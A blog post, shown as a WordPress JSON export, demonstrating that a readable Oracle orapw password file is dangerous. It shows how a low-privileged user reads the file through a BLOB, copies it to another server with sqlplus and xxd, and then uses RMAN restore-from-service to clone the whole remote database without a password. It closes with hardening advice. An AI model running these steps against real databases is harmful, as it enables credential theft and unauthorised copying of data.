{"id":10744,"date":"2018-01-05T12:02:45","date_gmt":"2018-01-05T11:02:45","guid":{"rendered":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/"},"modified":"2018-01-05T12:02:45","modified_gmt":"2018-01-05T11:02:45","slug":"keep-your-orapw-password-file-secure","status":"publish","type":"post","link":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/","title":{"rendered":"Keep your orapw password file secure"},"content":{"rendered":"

By Franck Pachot<\/h2>\n

.
\nThis is a small demo I did when I’ve found a database password file (orapw) lying around in \/tmp with -rw-rw-rw- permissions, to show how this is a bad idea. People think that the orapw file only contains hashes to validate a password given, and forget that it can be used to connect to a remote database without password.
\n
\nI can easily imagine why the orapwd was there in \/tmp. To build a standby database, you need to copy the password file to the standby server. If you don’t have direct access to the oracle user, but only a sudo access for ‘security reasons’, you can’t scp easily. Then you copy the file to \/tmp, make it readable by all users, and you can scp with your user.<\/p>\n

In this demo I don’t even have access to the host. I’ve only access to connect to a PDB with the SCOTT users, reated with utlsampl.sql, with those additional privileges, a read access on $ORACLE_HOME\/dbs:<\/p>\n

\nSQL> connect sys\/oracle@\/\/192.168.56.122\/PDB1 as sysdba\nConnected.\n \nSQL> create or replace directory DBS as '\/u01\/app\/oracle\/product\/12.2.0\/dbhome_1\/dbs';\nDirectory DBS created.\n \nSQL> grant read on directory DBS to SCOTT;\nGrant succeeded.\n<\/code><\/pre>\n
People tend to grant many privileges, and think that a read access on a directory which is supposed to contain only configuration files is harmless. Let’s see what you can do from another server.<\/p>\n
Get the orapw file from a remote connection<\/h3>\n
I connect with SCOTT which can read from ORACLE_HOME\/dbs:<\/p>\n
\nSQL> connect scott\/tiger@\/\/192.168.56.122\/PDB1\nConnected.\n \nSQL> show user\nUSER is \"SCOTT\"\n \nSQL> select * from all_directories;\n \nOWNER   DIRECTORY_NAME   DIRECTORY_PATH                                  ORIGIN_CON_ID\n-----   --------------   --------------                                  -------------\nSYS     DBS              \/u01\/app\/oracle\/product\/12.2.0\/dbhome_1\/dbs                 4\n<\/code><\/pre>\n
I create a table to read this file (other possibilities utl_tile, external tables,…):<\/p>\n
\nSQL> create table DEMO ( b blob );\nTable DEMO created.\n \nSQL> insert into demo values ( bfilename('DBS','orapwCDB1') );\n1 row inserted.\n<\/code><\/pre>\n
I’m on another server with the same version of Oracle Database software installed.<\/p>\n
I use sqlplus to retrieve the server file to my client:<\/p>\n
\nsqlplus -s scott\/tiger@\/\/192.168.56.122\/PDB1 <<EOF |xxd -p -r > $ORACLE_HOME\/dbs\/orapwCDB1\nset pages 0 lin 17000 long 1000000000 longc 16384\nselect * from DEMO;\nexit\nEOF\n<\/code><\/pre>\n
This (documented by Laurent Schneider<\/a>) uses sqlplus to display the BLOB variable as hexadecimal code and xdd (installed with vim-common) to revert it to binary.<\/p>\n
So, on my server I have a copy of the database password file for the database I want to steal:<\/p>\n
\n[oracle@VM122 ~]$ strings \/u01\/app\/oracle\/product\/12.2.0\/dbhome_1\/dbs\/orapwCDB1\n \nORACLE Remote Password file\nX)l)|\nSYSDG\n+933k\nSYSBACKUP\nf       ts6 $9\nSYSKM\n<\/code><\/pre>\n
Pull<\/h3>\n
A nice feature of 12c<\/i> is the ability to pull backups from a service. With this, it is the destination that connects to the source. I have diagrams to explain here<\/a>). It is an easy alternative to RMAN DUPLICATE (see MOS Doc ID 2283978.1 Creating a Physical Standby database using RMAN restore from service<\/a>). And one difference is that you don’t have to provide the password:<\/p>\n
I prepare a small init.ora and directory for the datafiles<\/p>\n
\necho \"db_name=CDB1\" > $ORACLE_HOME\/dbs\/initCDB1.ora\n \nmkdir -p \/u01\/oradata\/CDB1\n<\/code><\/pre>\n
I’m still on my server with the copy of the remote orapw file and a network access to the source database and I just restore it, without the need for a password:<\/p>\n
\nRMAN> connect target \/\nconnected to target database (not started)\n<\/code><\/pre>\n
I start a local instance:<\/p>\n
\nRMAN> startup nomount force\nOracle instance started\n \nTotal System Global Area     859832320 bytes\nFixed Size                     8798552 bytes\nVariable Size                784338600 bytes\nDatabase Buffers              58720256 bytes\nRedo Buffers                   7974912 bytes\n<\/code><\/pre>\n
I restore the controlfile:<\/p>\n
\nRMAN> restore controlfile from service '\/\/192.168.56.122\/CDB1';\nStarting restore at 05-JAN-18\nusing target database control file instead of recovery catalog\nallocated channel: ORA_DISK_1\nchannel ORA_DISK_1: SID=262 device type=DISK\nchannel ORA_DISK_1: starting datafile backup set restore\nchannel ORA_DISK_1: using network backup set from service \/\/192.168.56.122\/CDB1\nchannel ORA_DISK_1: restoring control file\nchannel ORA_DISK_1: restore complete, elapsed time: 00:00:02\noutput file name=\/u01\/oradata\/CDB1\/control01.ctl\noutput file name=\/u01\/fast_recovery_area\/CDB1\/control02.ctl\nFinished restore at 05-JAN-18\n<\/code><\/pre>\n
That’s the interesting part because it has to be connected, at least as SYSOPER, to the source database but I didn’t provide any password.<\/p>\n
I mount this controlfile locally:<\/p>\n
\nRMAN> alter database mount;\nStatement processed\n \nreleased channel: ORA_DISK_1\n<\/code><\/pre>\n
And now it is easy to pull the whole database (the CDB with all its PDBs) to my local server:<\/p>\n
\nRMAN> restore database from service '\/\/192.168.56.122\/CDB1';\nStarting restore at 05-JAN-18\nStarting implicit crosscheck backup at 05-JAN-18\nallocated channel: ORA_DISK_1\nchannel ORA_DISK_1: SID=262 device type=DISK\nCrosschecked 6 objects\nFinished implicit crosscheck backup at 05-JAN-18\nStarting implicit crosscheck copy at 05-JAN-18\nusing channel ORA_DISK_1\nFinished implicit crosscheck copy at 05-JAN-18\nsearching for all files in the recovery area\ncataloging files...\ncataloging done\n \nList of Cataloged Files\n=======================\nFile Name: \/u01\/fast_recovery_area\/CDB1\/autobackup\/2018_01_04\/o1_mf_s_964524009_f4vzyt59_.bkp\nFile Name: \/u01\/fast_recovery_area\/CDB1\/archivelog\/2018_01_04\/o1_mf_1_15_f4w5vv19_.arc\nFile Name: \/u01\/fast_recovery_area\/CDB1\/archivelog\/2018_01_04\/o1_mf_1_16_f4wmm0t8_.arc\nFile Name: \/u01\/fast_recovery_area\/CDB1\/archivelog\/2018_01_04\/o1_mf_1_14_f4vzjdl1_.arc\nusing channel ORA_DISK_1\nchannel ORA_DISK_1: starting datafile backup set restore\nchannel ORA_DISK_1: using network backup set from service \/\/192.168.56.122\/CDB1\nchannel ORA_DISK_1: specifying datafile(s) to restore from backup set\nchannel ORA_DISK_1: restoring datafile 00001 to \/u01\/oradata\/CDB1\/system01.dbf\nchannel ORA_DISK_1: restore complete, elapsed time: 00:00:16\nchannel ORA_DISK_1: starting datafile backup set restore\n...\n<\/code><\/pre>\n
So what?<\/h3>\n
This is not an issue and is totally expected. In a Data Guard configuration, the primary and standby database have to communicate with each others and then need a passwordless authentication. This is done with the password file, and this is the reason why you need to copy it rather than just create another one with the same passwords.<\/p>\n
So, there is more than just a hash of the password (which is required to validate a password) and probably includes a key (randomly generated when you create the password file) used for passwordless authentication.<\/p>\n
Then, be careful, and do not give read access to the orapw files. You must secure them in the same way as a ssh key or an encryption wallet. and this include:<\/p>\n
    \n
  • Do not leave a copy of the orapw file in a shared location<\/li>\n
  • Be careful with grants on directories, even in READ<\/li>\n
  • Do not grant CREATE ANY DIRECTORY except for a PDB with PATH_PREFIX lockdown<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"
    By Franck Pachot . This is a small demo I did when I’ve found a database password file (orapw) lying around in \/tmp with -rw-rw-rw- permissions, to show how this is a bad idea. People think that the orapw file only contains hashes to validate a password given, and forget that it can be used […]<\/p>\n","protected":false},"author":27,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[59],"tags":[221,96,209,25],"type_dbi":[],"class_list":["post-10744","post","type-post","status-publish","format-standard","hentry","category-oracle","tag-data-guard","tag-oracle","tag-oracle-12c","tag-security"],"acf":[],"yoast_head":"\nKeep your orapw password file secure - dbi Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Keep your orapw password file secure\" \/>\n<meta property=\"og:description\" content=\"By Franck Pachot . This is a small demo I did when I’ve found a database password file (orapw) lying around in \/tmp with -rw-rw-rw- permissions, to show how this is a bad idea. People think that the orapw file only contains hashes to validate a password given, and forget that it can be used […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/\" \/>\n<meta property=\"og:site_name\" content=\"dbi Blog\" \/>\n<meta property=\"article:published_time\" content=\"2018-01-05T11:02:45+00:00\" \/>\n<meta name=\"author\" content=\"Oracle Team\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Oracle Team\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/\"},\"author\":{\"name\":\"Oracle Team\",\"@id\":\"https:\/\/www.dbi-services.com\/blog\/#\/schema\/person\/66ab87129f2d357f09971bc7936a77ee\"},\"headline\":\"Keep your orapw password file secure\",\"datePublished\":\"2018-01-05T11:02:45+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/\"},\"wordCount\":653,\"commentCount\":0,\"keywords\":[\"Data Guard\",\"Oracle\",\"Oracle 12c\",\"Security\"],\"articleSection\":[\"Oracle\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/\",\"url\":\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/\",\"name\":\"Keep your orapw password file secure - dbi Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.dbi-services.com\/blog\/#website\"},\"datePublished\":\"2018-01-05T11:02:45+00:00\",\"author\":{\"@id\":\"https:\/\/www.dbi-services.com\/blog\/#\/schema\/person\/66ab87129f2d357f09971bc7936a77ee\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.dbi-services.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Keep your orapw password file secure\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.dbi-services.com\/blog\/#website\",\"url\":\"https:\/\/www.dbi-services.com\/blog\/\",\"name\":\"dbi Blog\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.dbi-services.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.dbi-services.com\/blog\/#\/schema\/person\/66ab87129f2d357f09971bc7936a77ee\",\"name\":\"Oracle Team\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/f711f7cd2c9b09bf2627133755b569fb5be0694810cfd33033bdd095fedba86d?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f711f7cd2c9b09bf2627133755b569fb5be0694810cfd33033bdd095fedba86d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f711f7cd2c9b09bf2627133755b569fb5be0694810cfd33033bdd095fedba86d?s=96&d=mm&r=g\",\"caption\":\"Oracle Team\"},\"url\":\"https:\/\/www.dbi-services.com\/blog\/author\/oracle-team\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Keep your orapw password file secure - dbi Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/","og_locale":"en_US","og_type":"article","og_title":"Keep your orapw password file secure","og_description":"By Franck Pachot . This is a small demo I did when I’ve found a database password file (orapw) lying around in \/tmp with -rw-rw-rw- permissions, to show how this is a bad idea. People think that the orapw file only contains hashes to validate a password given, and forget that it can be used […]","og_url":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/","og_site_name":"dbi Blog","article_published_time":"2018-01-05T11:02:45+00:00","author":"Oracle Team","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Oracle Team","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#article","isPartOf":{"@id":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/"},"author":{"name":"Oracle Team","@id":"https:\/\/www.dbi-services.com\/blog\/#\/schema\/person\/66ab87129f2d357f09971bc7936a77ee"},"headline":"Keep your orapw password file secure","datePublished":"2018-01-05T11:02:45+00:00","mainEntityOfPage":{"@id":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/"},"wordCount":653,"commentCount":0,"keywords":["Data Guard","Oracle","Oracle 12c","Security"],"articleSection":["Oracle"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/","url":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/","name":"Keep your orapw password file secure - dbi Blog","isPartOf":{"@id":"https:\/\/www.dbi-services.com\/blog\/#website"},"datePublished":"2018-01-05T11:02:45+00:00","author":{"@id":"https:\/\/www.dbi-services.com\/blog\/#\/schema\/person\/66ab87129f2d357f09971bc7936a77ee"},"breadcrumb":{"@id":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.dbi-services.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Keep your orapw password file secure"}]},{"@type":"WebSite","@id":"https:\/\/www.dbi-services.com\/blog\/#website","url":"https:\/\/www.dbi-services.com\/blog\/","name":"dbi Blog","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.dbi-services.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.dbi-services.com\/blog\/#\/schema\/person\/66ab87129f2d357f09971bc7936a77ee","name":"Oracle Team","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f711f7cd2c9b09bf2627133755b569fb5be0694810cfd33033bdd095fedba86d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f711f7cd2c9b09bf2627133755b569fb5be0694810cfd33033bdd095fedba86d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f711f7cd2c9b09bf2627133755b569fb5be0694810cfd33033bdd095fedba86d?s=96&d=mm&r=g","caption":"Oracle Team"},"url":"https:\/\/www.dbi-services.com\/blog\/author\/oracle-team\/"}]}},"_links":{"self":[{"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/posts\/10744","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/users\/27"}],"replies":[{"embeddable":true,"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/comments?post=10744"}],"version-history":[{"count":0,"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/posts\/10744\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/media?parent=10744"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/categories?post=10744"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/tags?post=10744"},{"taxonomy":"type","embeddable":true,"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/type_dbi?post=10744"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}